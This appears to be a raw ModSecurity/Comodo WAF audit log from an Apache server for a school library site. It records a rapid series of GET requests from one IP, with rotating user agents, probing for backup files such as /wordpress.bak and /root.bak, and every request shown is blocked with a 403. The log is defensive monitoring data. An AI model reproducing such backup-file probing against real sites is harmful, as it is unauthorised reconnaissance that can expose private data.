Accept-Encoding: gzip X-Varnish: 73531434 --97c9c573-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --97c9c573-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201493598 10655 (- - -) Stopwatch2: 1747683201493598 10655; combined=704, p1=364, p2=313, p3=0, p4=0, p5=26, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97c9c573-Z-- --6c3d0407-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_fgAAAI4 103.236.140.4 60860 103.236.140.4 8181 --6c3d0407-B-- GET /2023.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0.2) Gecko/20100101 Firefox/67.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 163545866 --6c3d0407-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6c3d0407-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201497794 6656 (- - -) Stopwatch2: 1747683201497794 6656; combined=760, p1=410, p2=322, p3=0, p4=0, p5=28, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c3d0407-Z-- --a67df47a-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_hgAAAJA 103.236.140.4 59872 103.236.140.4 8181 --a67df47a-B-- GET /index.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159128051 --a67df47a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a67df47a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201500927 3699 (- - -) Stopwatch2: 1747683201500927 3699; combined=697, p1=349, p2=321, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a67df47a-Z-- --1cc2e569-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_hwAAAIs 103.236.140.4 59606 103.236.140.4 8181 --1cc2e569-B-- GET /wordpress.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153813016 --1cc2e569-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1cc2e569-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201495882 8921 (- - -) Stopwatch2: 1747683201495882 8921; combined=719, p1=361, p2=332, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1cc2e569-Z-- --6b7b8f40-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFfwAAANU 103.236.140.4 58882 103.236.140.4 8181 --6b7b8f40-B-- GET /test.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118390814 --6b7b8f40-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6b7b8f40-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201490607 17976 (- - -) Stopwatch2: 1747683201490607 17976; combined=717, p1=329, p2=348, p3=0, p4=0, p5=39, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b7b8f40-Z-- --5758e760-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIon4QAAABE 103.236.140.4 60834 103.236.140.4 8181 --5758e760-B-- GET /root.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:60.0.1) Gecko/20100101 Firefox/60.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165806086 --5758e760-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5758e760-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201506000 9639 (- - -) Stopwatch2: 1747683201506000 9639; combined=1421, p1=987, p2=400, p3=0, p4=0, p5=33, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5758e760-Z-- --1a917a1c-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9n7wAAAFQ 103.236.140.4 59860 103.236.140.4 8181 --1a917a1c-B-- GET /vb.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36 OPR/55.0.2994.47 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 119046198 --1a917a1c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1a917a1c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201497622 18210 (- - -) Stopwatch2: 1747683201497622 18210; combined=669, p1=320, p2=330, p3=0, p4=0, p5=19, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a917a1c-Z-- --b32c5a26-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9n_AAAAEU 103.236.140.4 59804 103.236.140.4 8181 --b32c5a26-B-- GET /erpustakaan.smkn22jakarta.sch.id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166920201 --b32c5a26-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b32c5a26-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".smkn22jakarta.sch.id.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201514336 2246 (- - -) Stopwatch2: 1747683201514336 2246; combined=876, p1=421, p2=424, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b32c5a26-Z-- --4ca61c02-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIon4gAAAAo 103.236.140.4 60826 103.236.140.4 8181 --4ca61c02-B-- GET /2017.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729 Safari/537.36 OPR/57.0.3098.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165773318 --4ca61c02-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4ca61c02-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201504482 12614 (- - -) Stopwatch2: 1747683201504482 12614; combined=1514, p1=914, p2=571, p3=0, p4=0, p5=29, sr=387, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ca61c02-Z-- --b9bfcd53-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9oAwAAAEw 103.236.140.4 59026 103.236.140.4 8181 --b9bfcd53-B-- GET /2010.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 149913636 --b9bfcd53-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b9bfcd53-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201514296 3939 (- - -) Stopwatch2: 1747683201514296 3939; combined=689, p1=353, p2=310, p3=0, p4=0, p5=25, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9bfcd53-Z-- --1162557f-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIon5QAAAAE 103.236.140.4 59712 103.236.140.4 8181 --1162557f-B-- GET /2021.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 OPR/55.0.2994.44 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159449109 --1162557f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1162557f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201513476 6325 (- - -) Stopwatch2: 1747683201513476 6325; combined=611, p1=212, p2=369, p3=0, p4=0, p5=30, sr=46, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1162557f-Z-- --31a6a51b-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9n6gAAAFA 103.236.140.4 60862 103.236.140.4 8181 --31a6a51b-B-- GET /aspx.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 OPR/55.0.2994.37 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 148936204 --31a6a51b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --31a6a51b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201504435 15777 (- - -) Stopwatch2: 1747683201504435 15777; combined=1035, p1=555, p2=442, p3=0, p4=0, p5=38, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31a6a51b-Z-- --298c1720-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9n-wAAAEM 103.236.140.4 59444 103.236.140.4 8181 --298c1720-B-- GET /forum.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1; rv:66.0.1) Gecko/20100101 Firefox/66.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 121648930 --298c1720-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --298c1720-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201514232 7591 (- - -) Stopwatch2: 1747683201514232 7591; combined=633, p1=308, p2=298, p3=0, p4=0, p5=27, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --298c1720-Z-- --08fb2e55-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFoAAAANY 103.236.140.4 60868 103.236.140.4 8181 --08fb2e55-B-- GET /code.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:61.0.1) Gecko/20100101 Firefox/61.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166821897 --08fb2e55-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --08fb2e55-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201516755 6463 (- - -) Stopwatch2: 1747683201516755 6463; combined=667, p1=354, p2=286, p3=0, p4=0, p5=26, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08fb2e55-Z-- --52ea272e-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIon7AAAABA 103.236.140.4 59678 103.236.140.4 8181 --52ea272e-B-- GET /2012.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 OPR/51.0.2830.55 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168001539 --52ea272e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --52ea272e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201522856 2606 (- - -) Stopwatch2: 1747683201522856 2606; combined=660, p1=314, p2=311, p3=0, p4=0, p5=34, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52ea272e-Z-- --8594352f-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFpwAAAMg 103.236.140.4 60820 103.236.140.4 8181 --8594352f-B-- GET /clients.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.80 Safari/537.36 OPR/56.0.3051.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164888588 --8594352f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8594352f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201521343 5596 (- - -) Stopwatch2: 1747683201521343 5596; combined=919, p1=344, p2=343, p3=0, p4=0, p5=232, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8594352f-Z-- --6c230662-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9oEAAAAEU 103.236.140.4 59804 103.236.140.4 8181 --6c230662-B-- GET /erpustakaan_smkn22jakarta_sch_id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:62.0.3) Gecko/20100101 Firefox/62.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 119046201 --6c230662-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6c230662-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201525402 2042 (- - -) Stopwatch2: 1747683201525402 2042; combined=693, p1=327, p2=337, p3=0, p4=0, 